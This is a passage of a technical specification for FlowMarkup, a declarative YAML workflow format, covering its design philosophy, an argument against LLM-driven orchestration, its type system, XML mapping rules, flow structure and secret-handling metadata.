# FlowMarkup: Process Flow Definition Format

**Version:** 0.9.0
**Date:** 2026-03-28
**Designed by:** Łukasz Nawojczyk
**Copyright:** © 2026 Progralink Łukasz Nawojczyk. All rights reserved.
**License:** Open Web Foundation Agreement 1.0 (OWFa 1.0)

### Conformance

The key words "MUST", "MUST NOT", "SHOULD", "SHOULD NOT", and "MAY" in this specification are to be interpreted as described in [RFC 2119](https://www.rfc-editor.org/rfc/rfc2119).

## Design Philosophy

### Processes Are Contracts, Not Programs

A payment pipeline promises that funds transfer correctly. A claims workflow promises consistent evaluation against the same rules. A compliance process promises regulators that controls execute in order, every time, without exception.

These promises are contracts — with customers, with regulators, with the business itself. FlowMarkup treats process definitions as formal contracts: declarative specifications that state precisely what will happen, under what conditions, with what guarantees. Not programs that happen to produce the right behavior most of the time — contracts that can be read, validated, tested, and audited before a single step executes.

This distinction drives every design decision in the format.

### Core Principles

**1. Declared, not generated.** The flow definition IS the specification. Every step, every branch, every error handler, every timeout is stated explicitly in YAML. There is no hidden logic, no implicit behavior, no runtime decision-making about what to do next. What you read is what executes.

This means the flow definition serves simultaneously as documentation, as specification, as the auditable record, and as the executable artifact. There is no drift between what was specified and what runs, because they are the same thing. When behavior changes, there is a diff to review. Rollback means deploying the previous version.

**2. Constrained by design.** FlowMarkup deliberately limits what you can express. There are a small, fixed set of directives and a small, fixed set of default actions (call, run, request, exec, mail, storage, ssh) — not an extensible set. CEL expressions are non-Turing-complete — no unbounded loops, no I/O, no side effects. Actions are typed contracts with declared inputs, outputs, and errors — not arbitrary function calls.

These constraints are features, not limitations. A non-Turing-complete expression language can be statically analyzed for termination, type correctness, and security properties. A finite directive set can be exhaustively validated by schema and static analysis. A typed action contract can be verified at authoring time, tested with mocks at the service boundary, and monitored at runtime. Every constraint in FlowMarkup exists because it enables a guarantee that unconstrained systems cannot provide.

**3. Orchestration separated from execution.** FlowMarkup separates WHAT the process does (the flow definition) from HOW each step executes (action providers and services). The flow controls sequencing, branching, error handling, retry, timeout, and data flow. Action providers handle I/O — database queries, API calls, file operations, AI inference.

This separation is why flows can be validated without running external services, tested with mocked services in milliseconds, deployed across environments by changing service configuration, and composed into larger processes through sub-flow invocation — all without modifying the flow itself.

**4. Contracts over conventions.** Every flow declares its interface: what it requires (`input:`), what it produces (`output:`), what can go wrong (`throws:`), what it yields mid-execution (`yields:`). Every action declares the same. Kinds are explicit (`$kind:`). Content types are explicit (`$type:`). Defaults are explicit (`$default:`). Nullability is explicit (`$nullable:`).

There is no implicit contract, no reliance on documentation that drifts, no assumption that the caller "just knows" the data format. The schema validates contracts structurally. Static analysis verifies they are honored semantically. Tests exercise them against scenarios.

**5. Secure by default, not by effort.** Security in FlowMarkup is structural, not a checklist of best practices bolted onto a permissive system:

- CEL cannot perform I/O or modify host state — eliminating entire vulnerability classes by construction.
- Expression results are never re-evaluated as expressions — eliminating injection-via-output.
- Secrets are opaque values (`SECRET.*`) with mandatory redaction, no auto-coercion, no template interpolation — enforced by dedicated SA-SECRET rules.
- Capabilities decrease monotonically down the call chain — sub-flows never gain privileges their parent does not hold.
- `exec` and `mail` are deny-by-default with explicit allowlists.
- Static analysis rules — including SA-SECRET, SA-CEL, SA-RUN, and SA-EXEC categories — catch security violations at authoring time.

The flow author does not need to remember to sanitize inputs or redact secrets. The format and toolchain enforce it.

**6. Readable by all stakeholders.** A business process has multiple stakeholders: the engineer who builds it, the analyst who designs it, the compliance officer who approves it, the on-call engineer who debugs it at 3am. All of them need to understand what the process does.

FlowMarkup is YAML — readable by non-engineers with minimal orientation. The flow definition shows business logic without infrastructure noise. A `forEach` loop is a `forEach` loop, not a thread pool with a callback. An error handler is a `catch:` block, not a try-catch-finally chain wrapped in a retry decorator inside an async context manager. A timeout is `timeout: 30s`, not a configuration object passed to a client builder.

This is a deliberate trade-off: FlowMarkup sacrifices the expressiveness of general-purpose languages for readability across stakeholder boundaries.

**7. Auditable by construction.** Every execution follows the declared flow. The execution trace maps 1:1 to the flow definition — each step emits an OpenTelemetry span with type, label, and error information. When something goes wrong, the trace points to a specific step in a specific flow definition that anyone can read.

Compliance teams review the YAML and know exactly what will happen before it happens. Auditors trace an execution and map every decision to a declared branch in the flow. There is no gap between "what the specification says" and "what the system did."

### Why Not General-Purpose Code?

General-purpose languages offer full control and Turing-complete expressiveness. FlowMarkup deliberately gives up both.

Process orchestration does not need Turing completeness — it needs sequencing, branching, looping, error handling, and typed data flow. Providing more power than necessary has costs: business logic drowns in infrastructure boilerplate (HTTP clients, connection pools, serialization, retry loops). Contracts live in documentation that drifts from code. Validation requires hand-written tests for every path. Non-engineers cannot read, review, or audit the logic.

Workflow frameworks (Temporal, Airflow, Step Functions) address some of these problems but remain imperative programs in a host language — carrying that language's complexity, opacity, and attack surface. The process definition is scattered across code, configuration, and framework conventions rather than contained in a single, readable, validatable artifact.

### Why Not AI-Driven Orchestration?

Agentic AI workflows — where a large language model decides which tools to call, in what order, with what arguments — invert every principle above:

- **Non-deterministic.** The same prompt produces different execution paths on every run. There is no stable definition to version, diff, review, or roll back. Model updates and sampling variance silently change behavior.
- **Opaque.** Logic is a natural-language prompt that cannot be statically analyzed, formally verified, or structurally validated. Understanding what the system does requires running it — repeatedly, because each run may differ.
- **Unvalidatable.** No schema, no type system, no compile step. Correctness can only be assessed empirically, and empirical assessment of a non-deterministic system is fundamentally incomplete.
- **Untestable.** Testing requires full model inference — slow, expensive, non-reproducible. There is no meaningful notion of coverage when execution paths are determined at runtime by a stochastic model.
- **Insecure.** Every LLM call is a prompt injection surface. The model can hallucinate parameters, fabricate endpoints, or exfiltrate data through tool arguments. The "code" is regenerated on every execution, making security review a per-invocation problem.
- **Unauditable.** Non-determinism makes audit trails unreliable. Explaining why a decision was made requires inspecting model internals, which even the model's creators cannot fully account for.
- **Expensive.** Every orchestration decision incurs LLM inference cost and latency — seconds and per-token billing per step, scaling linearly with complexity.

These are not engineering shortcomings to be fixed with better prompts or more guardrails. They are inherent properties of a stochastic model. Non-determinism is what makes LLMs powerful — it enables creativity, generalization, and flexible reasoning. But orchestration demands the opposite: determinism, predictability, and formal verifiability. Using a stochastic model as an orchestrator means fighting its core strength.

### Where AI Belongs

FlowMarkup does not reject AI. It separates what AI is good at from what orchestration requires.

AI excels at specific tasks: classification, generation, analysis, translation, summarization, anomaly detection, decision support. These are capabilities — powerful ones. But performing tasks well is fundamentally different from deciding which tasks to perform, in what order, with what error handling and recovery strategy. The first is a capability problem. The second is a control problem. FlowMarkup handles control. AI handles capability.

In FlowMarkup, AI is a **callable service** behind a typed action contract:

```yaml
- call:
    service: claude
    operation: classify
    params:
      text: =customer_message
      categories: ["billing", "technical", "general"]
    result:
      category: classification
    timeout: 10s
    retry:
      maxAttempts: 3
      onErrors: [TimeoutError, ServiceUnavailableError]
```

The flow author controls **when** AI is invoked, **with what inputs**, **under what constraints** (timeout, retry, circuit breaker, rate limit), and **how to handle its outputs** — including validation, error paths, and fallback logic. The AI performs the task. The flow controls the process. Each operates in the domain where it is strong.

### AI-Assisted Authoring

AI can also help **write** FlowMarkup flows. This is fundamentally different from AI **being** the workflow — and it is where the format's constraints become a decisive advantage.

AI-generated code in general-purpose languages must be manually reviewed for correctness, security vulnerabilities, hallucinated API calls, and subtle logic errors. This review requires deep expertise, is error-prone, and does not scale. The reviewer must catch problems that look plausible but are wrong — the hardest kind of bug to find.

AI-generated FlowMarkup passes through the same three-layer validation as human-authored flows. JSON Schema catches structural errors. Static analysis rules catch semantic errors — undefined variables, unreachable code, secret misuse, type mismatches, invalid expressions. The testing framework verifies behavior. The validation does not care whether a human or an AI wrote the flow — it enforces the same rules, with the same rigor, every time.

The format's constraints work in AI's favor: a finite vocabulary (a fixed set of directives, typed actions, CEL expressions), a strict schema, and unambiguous semantics reduce the space of possible outputs, making generation more reliable than producing arbitrary code. And when the AI makes a mistake, the toolchain catches it at authoring time — not in production.

---

## 1. Core Concepts

### 1.1 Terminology

| Term | Definition | Examples |
|---|---|---|
| **Step** | Any item in a `do:` list | All of the below |
| **Directive** | Built-in control flow step. Fixed schema, engine-native. | `group`, `if`, `forEach`, `while`, `repeat`, `try`, `set`, `log`, `logWarn`, `logError`, `switch`, `assert`, `throw`, `return`, `yield`, `wait`, `waitUntil`, `break`, `continue`, `emit`, `waitFor`, `lock`, `cancel`, `parallel`, `race` |
| **Action** | Step performing I/O. Declares `output`/`errors` contract. Loaded by the engine's action providers. | `call`, `exec`, `request`, `run`, `mail`, `storage`, `ssh`, any custom |
| **Service** | A named target invoked by the `call` action via `service:` | `SERVICES.claude` |

Steps are either **directives** or **actions**. Directives control execution flow. Actions perform I/O operations.

### 1.2 Typed Contracts

Every flow and every action declares:
- **input** -- what it requires
- **output** -- what it produces
- **errors** -- what can go wrong

`output:` (flow level) declares the flow's output contract. `result:` (step level) maps an action's return values into flow variables.

### 1.3 Unified Type System

The type system uses four fields:

- **`$kind`** — structural data kind (UPPERCASE constant or CEL expression)
- **`$type`** — MIME content type (e.g., `application/json`, `image/png`)
- **`$format`** — regex validation pattern for string values. All regex evaluation in FlowMarkup (`$format` validation, `s.matches(regex)`, static analysis pattern matching) MUST use a linear-time regex engine (RE2 or equivalent). PCRE features (backreferences, lookaheads, lookbehinds) are NOT supported. Patterns using unsupported features MUST raise `ValidationError` at load time.
- **`$charset`** — IANA character encoding name for external text content (e.g., `shift_jis`, `windows-1252`)

`$kind` describes the structural category of the data:

| `$kind` | Default `$type` | Category |
|---|---|---|
| `STRING` | `text/plain` (single-line) | primitive |
| `TEXT` | `text/plain` | text |
| `MARKDOWN` | `text/markdown` | text |
| `BINARY` | `application/octet-stream` | binary |
| `NUMBER` | exact decimal | primitive |
| `INTEGER` | exact integer | primitive |
| `BOOLEAN` | boolean | primitive |
| `ARRAY` | `application/json` | collection |
| `MAP` | `application/json` | structured |
| `DIRECTORY` | (filesystem) | resource |
| `ANY` | `application/octet-stream` | untyped |

`DIRECTORY` represents a filesystem directory listing from RESOURCES. Entries are maps with `name` (STRING), `size` (INTEGER), and `type` (STRING: `file` or `directory`) keys.

**Compound shorthands:** `JSON`, `YAML`, `XML`, `CSV`, and `TSV` are shorthands that expand to `$kind` + `$type`:
- `JSON` expands to `$kind: MAP, $type: application/json`
- `YAML` expands to `$kind: MAP, $type: application/yaml`
- `XML` expands to `$kind: MAP, $type: application/xml`
- `CSV` expands to `$kind: ARRAY, $type: text/csv`
- `TSV` expands to `$kind: ARRAY, $type: text/tab-separated-values`

These shorthands are accepted anywhere `$kind` is accepted (paramDef, typedVar, etc.) and are expanded by the engine at load time.

**`$kind` inference (paramDef only):** In input/output parameter declarations, `$kind` may be omitted when unambiguously inferable. The engine resolves `$kind` using these rules (in precedence order):

1. **Explicit `$kind`** always wins — no inference needed.
2. **`$schema` → `$kind`** — the engine resolves the schema's root `type` field: `object` → MAP, `array` → ARRAY, `string` → STRING, `number` → NUMBER, `integer` → INTEGER, `boolean` → BOOLEAN. When the schema is unresolvable (external `$ref` not yet fetched, resolution disabled), the engine defaults to MAP. The inferred `$kind` may be lazily updated once the schema is resolved. **Recommendation:** when a schema defines an array root type, authors should use explicit `$kind: ARRAY` for clarity.
3. **`$enum` → `$kind: STRING`** — since `$enum` items are always strings per the schema.
4. **`$default` (literal) → `$kind`** — inferred from the YAML scalar type of the default value: string → STRING, integer → INTEGER, float → NUMBER, boolean → BOOLEAN, sequence → ARRAY, mapping → MAP. `null` and CEL expressions (`=...`) cannot infer `$kind` — explicit `$kind` is required.

If both `$schema` and `$default` are present, `$schema` takes precedence for inference. The engine SHOULD warn (SA-KIND-4) if the inferred `$kind` from `$default` conflicts with the inferred `$kind` from `$schema`.

**Scope:** `$kind` inference applies to `paramDef` only (input/output parameter declarations). `typedVar` (vars/const) keeps `$kind` required — variables always have `$value` which is more ambiguous (CEL expressions are common there).

CSV and TSV content is parsed into a list of MAP objects where each map represents a row keyed by column headers from the first line. The header row is mandatory; content without a header row raises `ParseError`. Parsing is lazy — the engine defers parsing until the first CEL access to the value's content. CSV follows RFC 4180 (comma delimiter, quoted fields supporting embedded commas and newlines). TSV uses tab as the delimiter.

#### XML-to-MAP Mapping Convention

XML content is parsed into a MAP using a deterministic mapping convention. This convention applies universally to all XML auto-decode contexts: `decode(XML)`, `parse(XML)`, `parseAs: XML` (exec/ssh/request/storage auto-parse), and RESOURCES `.xml` file loading. The same convention governs `encode(XML)` in reverse.

**Mapping rules:**

- Root element becomes the single top-level MAP key (enables roundtrip: `decode(XML).encode(XML)`)
- Child elements become MAP keys with their parsed content as values
- Text-only elements (no attributes, no children) become bare string values: `<name>Alice</name>` → `"Alice"`
- Elements with attributes AND text use `@` prefix for attributes and `$text` for text content: `<item sku="A1">Widget</item>` → `{"@sku": "A1", "$text": "Widget"}`
- Multiple same-name siblings become an ARRAY
- Empty elements become empty string `""` (no attributes) or MAP with only `@` keys (has attributes)
- **All element text values are STRING** — no number/boolean coercion (consistent with XML's type-agnostic nature; use `int()`, `double()`, `bool()` in CEL for type conversion)
- CDATA treated as text (merged into `$text`)
- Comments and processing instructions discarded
- Namespaces: preserve prefixes as-is (`ns:element` stays `ns:element`)
- XML declaration discarded on parse, regenerated on encode

**Example:**

```xml
<order id="123" status="pending">
  <customer>
    <name>Alice</name>
    <email>alice@example.com</email>
  </customer>
  <items>
    <item sku="A1">Widget</item>
    <item sku="A2">Gadget</item>
  </items>
</order>
```

Parses to:

```yaml
order:
  "@id": "123"
  "@status": "pending"
  customer:
    name: Alice
    email: alice@example.com
  items:
    item:
    - "@sku": A1
      "$text": Widget
    - "@sku": A2
      "$text": Gadget
```

**Limitation — mixed content:** Mixed content (`<p>Hello <b>world</b></p>`) captures direct text in `$text` and child elements as separate keys but loses text-vs-element ordering. Recommend XPath for complex mixed-content queries.

**Limitation — single vs array ambiguity:** A single `<item>` produces a MAP value, not a one-element ARRAY. Shape depends on data. To guarantee consistent array behavior regardless of cardinality, use `xpathAll()` which always returns a list. Static analysis rule SA-XML-4 (WARN) MUST flag direct map access on XML-decoded values whose cardinality is data-dependent. The `decode(XML)` function MUST support a `forceArray` option: `decode(XML, {forceArray: ['item']})` — listed element names always produce arrays, even for single elements.

**Guidance:** When processing XML with potentially variable-cardinality elements, validate the result structure with `type(value)` before access, or use `$schema` validation on the parsed output. For strict array behavior, prefer `xpathAll()` which always returns a list.

`$type` is an explicit MIME content type. When `$kind` is specified without `$type`, the engine derives the default `$type` from the table above. When `$type` is specified explicitly, it overrides the default. Full MIME types are accepted: `image/png`, `application/pdf`, etc. Any valid MIME type per RFC 6838 is accepted. The engine SHOULD NOT reject unknown MIME types — it stores them as-is and passes them to action providers for interpretation.

`$format` is a regex pattern for string validation. The engine validates on assignment and throws `ValidationError` if the value does not match. Example: `$format: "^[A-Z]{3}$"` for currency codes.

`STRING` is single-line (no `\n`, `\r`). The engine validates on assignment and throws `ValidationError` if line breaks are present.

The engine always resolves a kind to a valid MIME content type -- never null.

### 1.4 Schema: Directives vs Actions

The core JSON Schema defines **only directives**. All actions are matched by a generic **action step** pattern. Action providers contribute type-specific schemas composed by the engine.

### 1.5 Error Naming

Error type names MUST use the `*Error` suffix. Error types support single-inheritance via `$parent:` in `throws:` declarations. User-defined parent types MUST be declared in the same `throws:` list (SA-ERR-2). System error types (those listed in the retryable/non-retryable table in §4.1) are implicitly available as parents and do not need re-declaration. Cycles are forbidden (SA-ERR-1).

`catch` entries are polymorphic: catching a parent type catches all descendants. `throw` always names an exact type; the engine attaches the full ancestry chain at throw time.

Three declaration forms:
- **String form** -- bare type name for errors with no `$parent` or `data`
- **Object form** -- `$kind:` key when `$parent`, `data`, or `_notes_` are needed
- **Nested form** -- parent→children map (key is parent type, value is array of child declarations); desugars to flat list with `$parent` references. See §2.3 Error Type Hierarchy.

### 1.6 Naming Conventions

| Context | Convention | Examples |
|---|---|---|
| Structural YAML keys | `camelCase` | `forEach`, `waitFor`, `failPolicy`, `onTimeout`, `parseAs` |
| Data element and event names | `snake_case` | `order_id`, `user_name`, `CONTEXT.correlation_id` |
| Enum values | `UPPERCASE` | `PARALLEL`, `RACE`, `GLOBAL`, `EXPONENTIAL`, `JSON`, `CSV` |

---

## 2. Format Specification

### 2.1 File Convention

- Extensions:
  - `.flowmarkup.yaml` (preferred) or `.flowmarkup.yml` -- pure YAML
  - `.flowmarkup.md` -- literate flow format (YAML frontmatter + Markdown body)
- Encoding: UTF-8
- YAML version: 1.2.2

**Flow document limits.** The engine MUST enforce the following configurable limits to prevent resource exhaustion during parsing and validation: (1) **Document size:** maximum 1 MB (configurable maximum: 10 MB). (2) **Step count:** maximum 10,000 steps per flow (configurable maximum: 100,000). (3) **Control flow nesting depth:** maximum 32 levels of nested directives (`if`/`forEach`/`group`/`try`/`while`/`repeat`/`switch`). (4) **Variable declarations:** maximum 1,000 combined `vars:` and `const:` entries per flow (configurable maximum: 10,000). Exceeding any limit MUST raise `ConfigurationError` at load time. SA-FLOW-8 (ERROR) enforces document size, SA-FLOW-9 (ERROR) enforces step count, SA-FLOW-10 (ERROR) enforces nesting depth. *(CWE-400)*

> **Quoting note:** In YAML 1.2.2 (Core Schema), the following bare values are parsed as their native types, not strings. Flow authors MUST quote `match:` keys and other literal string values that collide with these reserved forms when string comparison is intended (SA-YAML-1):
>
> | Category | Auto-typed values |
> |---|---|
> | Boolean | `true`, `True`, `TRUE`, `false`, `False`, `FALSE` |
> | Null | `null`, `Null`, `NULL`, `~`, empty value |
> | Integer | `0` – `9…`, `+N`, `-N`, `0xHEX`, `0oOCTAL` |
> | Float | `1.0`, `.5`, `1e10`, `.inf`, `.Inf`, `.INF`, `-.inf`, `.nan`, `.NaN`, `.NAN` |
>
> Examples: `"true"`, `"null"`, `"1"`, `".inf"`.

> **YAML 1.1 parser caveat:** Many widely-used YAML parsers default to YAML 1.1 (e.g., PyYAML for Python, SnakeYAML 1.x for Java, `gopkg.in/yaml.v2` for Go). YAML 1.1 additionally treats `on`/`off`/`yes`/`no`/`y`/`n` (case-insensitive) as booleans and uses a different octal prefix (`0777` instead of `0o777`). FlowMarkup requires YAML 1.2.2. Engine and tooling implementors MUST use a YAML 1.2-compliant parser. Examples by language: ruamel.yaml (Python), snakeyaml-engine (Java/JVM), `gopkg.in/yaml.v3` (Go; hybrid 1.1/1.2 — see CROSSLANG.md CL-6 for required post-parse normalization), js-yaml (JavaScript/TypeScript), yaml-rust2 (Rust), YamlDotNet (C#/.NET).
>
> **Design note:** FlowMarkup forbids bare `on:` as a YAML key — YAML 1.1 parsers interpret it as boolean `true`. All `on*` prefixed keys use camelCase compounds (`onTimeout:`, `onYield:`, `onErrors:`).

#### 2.1.1 Literate Flow Format (`.flowmarkup.md`)

A literate flow embeds the flow definition in YAML frontmatter delimited by `---`, with a Markdown body providing documentation.

```yaml
---
flowmarkup:
  title: "Order Processor"
  version: 2
  input:
    order_id: TEXT
  do:
    - assert: =order_id != null
authors: ["alice"]
---
# Order Processor
Documentation goes here.
```

**Frontmatter rules:**
- The file MUST begin with `---` on the first line
- The frontmatter MUST contain a `flowmarkup:` key
- Additional keys alongside `flowmarkup:` are allowed and ignored by the engine
- If `flowmarkup.documentation` is omitted, the Markdown body becomes `flowmarkup.documentation`
- If `flowmarkup.documentation` is set in frontmatter, the Markdown body is ignored
- Missing closing `---` is a parse error

### 2.2 Top-Level Structure

```yaml
flowmarkup:
  title: string                 # REQUIRED
  version: integer              # optional -- major version number (default: 1)
  description: string           # optional -- short one-line description
  documentation: string         # optional -- full Markdown (auto-loaded from .md body)
  timeout: duration|integer|CEL # optional -- fails entire flow if exceeded

  rateLimit:                   # optional
    invocations: integer|CEL
    per: duration|integer|CEL
    strategy: WAIT|REJECT       # default: WAIT
    scope: GLOBAL|CONTEXT|LOCAL # default: GLOBAL
    key: "<cel-expression>"     # optional -- per-key bucketing
    timeout: duration|integer|CEL

  circuitBreaker:              # optional -- object, "threshold/name", integer, or =CEL_REF
    name: '<cel-expression>'
    threshold: integer|CEL
    window: duration|integer|CEL # default: 1m
    resetTimeout: duration|integer|CEL # default: 30s
    halfOpenAttempts: integer|CEL # default: 3
    scope: GLOBAL|CONTEXT|LOCAL # default: GLOBAL
    errors: [ErrorType]         # optional whitelist (mutually exclusive with nonCountable)
    nonCountable: [ErrorType]   # optional blacklist (mutually exclusive with errors)

  defaults:                     # optional -- inherited by all descendant action steps
    retry: { ... } | "maxAttempts/delay/backoff"
    timeout: duration|integer
    rateLimit: { ... } | "invocations/per[/scope]"
    circuitBreaker: { ... } | =CEL_REF    # no shorthand in defaults (SA-DEF-5)
    cacheHint: { ... } | "<ttl>[/<revalidation>[/<scope>]]" | true | false

  idempotencyKey: "<cel-expression>" # optional -- deduplication key

  transaction: true | "GLOBAL" | "CONTEXT" | "LOCAL" # optional -- treats do: as implicit group (see §2.10)
  onRollbackError: CONTINUE | FAIL    # optional -- (default: CONTINUE)
  locking: PESSIMISTIC | OPTIMISTIC   # optional -- requires transaction: (default: PESSIMISTIC)

  triggers:                     # optional
    - event: event_type         #   optional condition: filter
    - cron: "0 9 * * MON-FRI"
    - schedule: "every 5m"

  events:                       # optional -- typed event contracts
    <event_type>:
      _notes_: ...
      data:
        <param_name>: <type>

  input:                        # optional
    <param>: <type>             # flat form; $default marks optional

  output:                       # optional
    <param>: <type>             # flat form, structured form, or single-value form

  yields:                       # optional -- streaming output contract
    $kind: <kind>               # single-value form
    # OR params: { <name>: { $kind, $schema, _notes_ } }

  throws:                       # optional
    - ErrorTypeName             # string form
    - { $kind, $parent, _notes_ } # object form

  requires: {}                  # REQUIRED -- capability requirements (use {} for none)
    ENV: [var1, var2]           #   per-variable
    CONTEXT: [key1, key2]       #   per-key read-write, or {read: [...], write: [...]}
    GLOBAL: [key1, key2]        #   per-key read-write, or {read: [...], write: [...]}
    SERVICES: [alias1, ...]     #   per-service array or typed object
    SUBFLOWS: true              #   boolean
    REQUEST: [origin1, ...]     #   per-origin pattern array
    EXEC: [cmd1, cmd2]          #   per-executable array
    MAIL: true | [@domain]      #   boolean or per-recipient array
    RUNTIME: true               #   boolean
    SECRET: [name1, name2]      #   per-secret array
    RESOURCES: [res1, ...]      #   named list or typed object

  services:                     # optional -- flow-defined service instances
    <alias>:
      provider: <provider-id>   # static string, not CEL
      properties: { ... }

  types:                        # optional -- named JSON Schema (Draft 2020-12) types
    <PascalCaseName>: { ... }   # inline JSON Schema or $ref to external file

  const:                        # optional -- immutable, initialized first
    <name>: <value | CEL>

  functions:                    # optional -- user-defined CEL functions
    <name>:
      params: [<param>, ...]
      body: =<CEL expression>

  examples:                     # optional -- named input/output example pairs
    <snake_case_name>:
      _notes_: string
      input:  { ... }
      output: { ... } | scalar

  onVersionChange:              # optional -- migration handler for checkpoint resume
    - <step>

  vars:                         # optional -- mutable state, initialized after const:
    <name>: <value | $kind declaration>

  do:                           # REQUIRED
    - <step>

  catch:                        # optional -- global error handler (map form)
    ErrorType:
      - <step>
    default:
      - <step>

  finally:                      # optional -- always runs
    - <step>
```

**Key rules:**
- `_id_`, `_label_`, `_notes_`, `_meta_` are step-level only, NOT valid at the flow root.
- `flowmarkup:` is the only key processed by the engine. Additional root-level keys are allowed and ignored.
- When `transaction:`, `onRollbackError:`, or `locking:` appear at the flow root, the engine treats the `do:` list as an implicit sequential `group:` with those properties — syntactic sugar for wrapping the entire `do:` in a single `group: { transaction: ..., onRollbackError: ..., locking: ..., do: [...] }`. `catch:` and `finally:` are unaffected and execute outside the implicit group.
- `defaults:` applies only to action steps, not directives. Step-level values **replace** (not merge with) inherited defaults. Set to `null` to disable an inherited default. `cacheHint:` in `defaults:` is silently ignored by non-storage action steps.
- `cacheHint:` two-way semantics: omitted = inherit from defaults, `cacheHint: false` is an explicit opt-out — the author asserts this data MUST NOT be cached. `cacheHint: true` is an explicit opt-in with engine-determined defaults.
- `finally:` runs after `catch:` handlers. If `finally:` itself throws, that error supersedes the original. The engine MUST chain the original error as `ERROR.CAUSE` on the finally-thrown error.

### 2.3 Flow Input / Output / Throws

The flow is a typed function: `flow(input) -> output throws errors`.

**Flat form** (preferred):

```yaml
input:
  order_id: STRING              # required -- no $default
  priority: {$default: standard}                   # optional — STRING inferred from $default
output:
  result: JSON
```

In flat `input:`, `$default` makes a param optional. In flat `output:`, all params are required.

Both `input:` and `output:` support flat form and structured form (`required:`/`optional:` subsections):

```yaml
input:
  required:
    order_id: STRING
    amount: NUMBER
  optional:
    currency: {$default: "USD"}                     # STRING inferred from $default
```

**Structured form** (when `output:` has optional params):

```yaml
output:
  required:
    best_result: TEXT
  optional:
    comparison_data: JSON
```

**Single-value output form:**

```yaml
output:
  $kind: BINARY
  $type: image/png
```

Paired with `return: <expression>` in the flow body.

**Parameter definition shorthand:** `order_id: STRING` is equivalent to `order_id: { $kind: STRING }`.

#### Error Type Hierarchy

Rules for `$parent:`:
- Parent MUST be declared in the same `throws:` list OR be a system error type (SA-ERR-2). System error types (those listed in FLOWMARKUP-ERRORS.md) are implicitly available as parents and do not need re-declaration.
- User-defined errors may extend other user-defined errors, provided the parent is declared earlier in the same `throws:` list. Multi-level chains are valid (e.g., `A extends B extends SystemError`).
- No cycles (SA-ERR-1), no self-parent (SA-ERR-4)
- Catch order matters: parent before child makes child unreachable (SA-ERR-3 warning)
- `ERROR.TYPE` always reflects the exact thrown type, even when matched polymorphically

**Nested shorthand:** Error hierarchies can be declared inline using map form:

```yaml
throws:
- NetworkError:
  - ConnectionRefusedError
  - DnsResolutionError
  - $kind: TimeoutError
    data:
      elapsed_ms: INTEGER
- FraudDetectedError              # no parent (flat form)
```

Desugars to flat list with `$parent` references. Parent type is implicitly declared. Children can be strings, `$kind` objects (with `data:`/`_notes_`), or nested hierarchies (recursive for multi-level). Mixed nested and flat items may coexist. SA-ERR-8: parent key must match error naming pattern (PascalCase, starts with uppercase).

Parent types automatically inherit the union of all children's `data:` fields — when catching a parent, `ERROR.DATA` has the shape of whichever child was actually thrown. When a `catch:` handler catches a parent type whose children have heterogeneous `data:` fields, accessing a child-specific field without a `has()` guard is unsafe — the field may not exist if a different child was thrown. Use `has(ERROR.DATA.field)` before accessing child-specific fields. SA-ERR-10 (WARN) flags unguarded access to child-specific error data fields in parent catch handlers.

#### Flow Yields (`yields:`)

A flow MAY declare a streaming output contract via `yields:`, independent of `output:`. The caller chooses consumption mode:
- **Streaming** -- `onYield:` on the call/run step
- **Materialized list** -- `$yields` in the step's `result:` mapping

**Two forms:**
- **Single-value** -- `yields: { $kind: TEXT }`
- **Multi-param** -- `yields: { params: { progress: { $kind: NUMBER } } }`

**`buffer:` on `onYield:`** -- controls how many yielded values buffer before the producer suspends. `0` (default) = synchronous backpressure.

**`onYield: FORWARD`** -- re-yield each element to the current flow's caller with end-to-end backpressure.

**Ordering guarantees:**
- `SEQUENCE` -- yields arrive in emission order
- `PARALLEL` -- yields interleave in arrival order
- `RACE` -- `yield` and `onYield: FORWARD` inside RACE branches are forbidden (SA-YIELD-10, SA-YIELD-20)

### 2.4 Data Elements (`vars`, `const`)

Data elements are named, typed values within a flow. They come in two forms: **mutable** (declared in `vars:` or created by `set:`) and **readonly** (declared in `const:` or marked with `$readonly: true`). Both share the same typed declaration model.

Data element names MUST be valid identifiers (`snake_case` recommended). Hyphens are forbidden (subtraction operator in CEL). The `$` character is forbidden in data element names.

Variables in `vars:` are initialized before `do:` (after `const:`). `=`-prefixed strings are CEL expressions; plain strings are literals; non-strings pass through. A `vars:` expression MUST NOT reference another `vars:` name (SA-INIT-2).

**Typed declarations** use `$kind` (REQUIRED)/`$type`/`$format`/`$value` (REQUIRED)/`$encoding`/`$name`/`$charset`:

**Naming rationale:** `$value` is the initial value assigned unconditionally when the variable is created. `$default` (on input parameters) is used only when the caller omits the parameter — the caller may override it. The distinction reflects the different semantics: variables always start with `$value`; parameters start with `$default` only in the absence of a caller-provided value.

```yaml
vars:
  greeting: Hello world           # string literal
  counter: 0                      # number
  api_config:
    $kind: JSON                   # compound shorthand: expands to $kind: MAP, $type: application/json
    $value: { endpoint: "https://api.example.com" }
  thumbnail:
    $kind: BINARY
    $type: image/png
    $name: photo.jpg
    $encoding: BASE64
    $value: iVBORw0KGgo...
  currency_code:
    $kind: STRING
    $format: "^[A-Z]{3}$"
    $value: USD
  user_data:
    $kind: CSV
    $value: |
      name,email,role
      alice,alice@example.com,admin
      bob,bob@example.com,viewer
  encoded_report:
    $kind: CSV
    $charset: windows-1252
    $value: =meta(RESOURCES.legacy_export).value
```

`$encoding` is needed only for binary data stored as encoded text in `typedVar`/`set:` declarations. Supported constants: `BASE64`, `BASE64URL`, `HEX`. These three constants are the only valid values for `$encoding`. For runtime value transformation (CEL `encode()`/`decode()` functions), additional encoding constants are available — see Encoding Constants below.

`$name` is an optional filename hint on any `typedVar`.

#### Variable Taint System (`$secret`, `$exportable`)

Two metadata fields on `typedVar` and `set:` typed declarations provide defense-in-depth for sensitive values:

**`$secret: true`** — variable becomes a local SecretValue. All SA-SECRET rules apply. Cannot be logged, returned, emitted, yielded, interpolated, compared, or assigned to another variable. Only valid use: pass to action `params:`. Implies `$exportable: false`.

**`$exportable: false`** — value is accessible in CEL (read, compare, transform) but blocked from output boundaries: `log:`, `return:`, `emit.data:`, `yield:`, `request.url:`, `throw.message:`. Weaker than `$secret` but allows computation. **Limitation:** `$exportable: false` only prevents accidental exposure at well-known output boundaries — it does NOT prevent intentional exfiltration. Values remain fully accessible in CEL and can be passed to action params, request bodies, and request headers. For values that must never leak, even intentionally, use `$secret: true`.

> **Security boundary:** `$exportable: false` prevents accidental exposure at output boundaries (return, emit, yield, log). It does NOT prevent intentional exfiltration through action parameters, request bodies, or request headers. For values that must never leave the engine process, use `$secret: true` (opaque SecretValue — no CEL string operations).
>
